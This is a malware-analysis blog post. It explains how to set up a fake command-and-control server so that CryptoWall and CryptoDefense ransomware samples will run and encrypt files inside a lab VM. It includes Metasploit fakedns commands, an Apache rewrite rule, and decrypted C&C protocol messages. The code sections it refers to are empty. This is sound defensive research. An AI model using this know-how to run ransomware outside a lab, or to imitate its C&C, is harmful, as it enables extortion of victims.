Tuesday, March 10, 2015

Getting CryptoWall and CryptoDefense working without C&C

It's common to find malware samples that need the C&C to work. This is the case of Cryptowall and CryptoDefense ransomwares. If you need to debug samples of these families you will usually find the C&C down and the ransom won't work and won't encrypt files. It only will try to connect to C&C continuously.

In this article i'm going to describe a way to create a fake C&C for CryptoWall and CryptoDefense families, and how to get samples of these families working into a vmware for example.

In the first place, we need to redirect any connection performed by the ransomware to our server. Depending on the sample they connect to different domains, so we need to redirect any connection to our fake server.

We will use metasploit's fakedns module for this purpose:

msf > use auxiliary/server/fakedns
msf auxiliary(fakedns) > set TARGETACTION FAKE
TARGETACTION => FAKE
msf auxiliary(fakedns) > set TARGETDOMAIN *
TARGETDOMAIN => *
msf auxiliary(fakedns) > set TARGETHOST 192.168.2.2
TARGETHOST => 192.168.2.2

With these commands we create a dns server that redirect any query to 192.168.2.2. On this ip address will be running an apache server.

In the second place we need to redirect any query to our http server (any URI) to the same document. We can do this by adding these lines to httpd.conf:

RewriteEngine On
RewriteCond %{REQUEST_URI} !^/index.php
RewriteRule . /index.php

Now we can implement the php to give to the ransomware the responses that they need to work.

CryptoWall


CryptoWall uses a query-response communication mechanism to communicate with the C&C. Communications are encrypted with rc4. Cryptowall client connects to C&C http server. The URI is the rc4 key in random order (it's neccesary to order it in growing order). The client sent via POST the query's data. So, to decrypt it, it's necesary to take the rc4 key of the URI, order it, and decrypt the POST content.

Example query:

8    0.218529    192.168.204.235    141.255.167.3    HTTP    156    POST /w72sh29mlo HTTP/1.1  (application/x-www-form-urlencoded)
w=c13314ada7ed648b9919aeff2306e02241242601e0744aa69304d98065c43670fca844aa579d9ab44f3c1bd89231b9351c34
Here we can see a complete communcation extracted from a pcap file:
Q:nvawc5uxnp,3de9a8c4e00c59e80a58059f17cdab179e740ac0337b673dd50e7499b43ea13c1c37d8def042e12d520b49da59650016c9
R:nvawc5uxnp,3deae595eb0f14
Q:ylrq5msbpctg,30c51f5e25a1f0346aa429e82c9db310dbdc13c8a8d11f93e3b8a734aeb90a295f4a01219bf164ce59b57591
Q:ylrq5msbpctg,30c0560d2ef8b0657faa69cf1d92ea5deef13993efcc41c4c9e5f87fafcd2928153c626f87ef7fa1328b04ab311a01913e75e057b68ae9b29ea70410f7f71316edb6b2490d19467c2b699e43abfefac5aa7028cb2e5ecfd8428a82820e85155cff3a94c56f7a7cc722189888237d65eb112674486631a0280a85412f722220cb83982c940230ccc35afee0c27cf7fd471cab5ed1ccd950f6cfdd5f44bde319421ec7ead45d9fb7d1163e15637874298a6ede97bc0cc3348463784b46c40fc26686e74e2522e66365b8e064a84b013601b081a7ee9ff68a2cfec79adfcb14e6080a52faf8aa98fad6a6192d8d19d2804707d697ee42ae9b12e844ba73e7844d95849997cb5c7fbfb0f58a4915e831d12b8d02512c39c575667b2e7bf4163e8858a026f783d5b0fa50a3d38bb5b8bbb66d45d8be2b45b3e422df25a8d18aec70aba9212748488f914df06a08f6666a551169898e95eed5b4b82a11fe7aea2e32e02774e6ed0b0df879156079d26e74fb6605989fdd4731a20c4d53bb5da13b04a936d20a8d91088e6e5a19e6eb0c13d49e46b26a8ed3dfd2a9331142a3fc1c08636f997bf5caedd9dc095a93b63810527541f78d33bb775955292277d2ae621fb95dc88e1bdc59f9e6c44caea922c327c6bbc2cb78831387f0bab6e58b8eb73392167c0c4085070f86fdeb2ada0cb966

The string before comma is the rc4 key. The string after comma is the POST data.

We can decrypt it with the script in the section Code 1 at the end of this article.

The decrypted queries/responses:

query:{1|cw200|99DC835DFC77319C2176AB46302136BF|2|1|2|}
response:{212|1}
query:{7|cw200|99DC835DFC77319C2176AB46302136BF|4}
response:{250|kpai7ycr7jxqkilp.onion|75a5|ES|-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq6ZEGywe2wC83CErmVhB
gn89wi2lq8rQyYZZGCUyQr5cQirN32HX5n6MNcJDjB8uINSosaHHGdCPUeOoetx9
IM3TiXZwwSnteGR+gBry/C7dr3JSAWrnLE+TkeO6mrQ8yUtaZ3ue7XSyvV457jLz
Lg1noHcLL/RXNKsP0MmbZW1yHvRulsuy5XW6clQqNMMmfAAT8y+UwePL7M0YG86q
SP9QQFB3B+FdlRJ/8VlN3Sva1JeXJbxGcbmowwtJEJVZtAuf9c7sDv5Kt1tlH8Z2
VXjg4P2Dw3KUg/7pcfL18SAEfsRBIONFvLNcrVdh0/W5aVh6/9djcnMiCV61CYkS
7wIDAQAB
-----END PUBLIC KEY-----}

We only need to imitate the communication with our php to get cryptowall working.
You can find a functional php file in the section Code 2 at the end of this article.

CryptoDefense


CryptoDefense communications are very similar to CryptoWall. It uses the same mechanism of query/response encrypted with rc4. We can use the same python script to decrypt communications. Here is a sample decrypted communication:

query:{1|cw200|99DC835DFC77319C2176AB46302136BF|2|1|2|}
response:{212|1}

With CryptoDefense we only need to response with a "OK" response to the client and it starts to encrypt.
The php file in the section Code 2 at the end of this article works for CryptoWall and CryptoDefense.


Code 1. Python script to decrypt Crytpowall communications



Code 2. Php fake Cryptowall/CryptoDefense server


No comments:

Post a Comment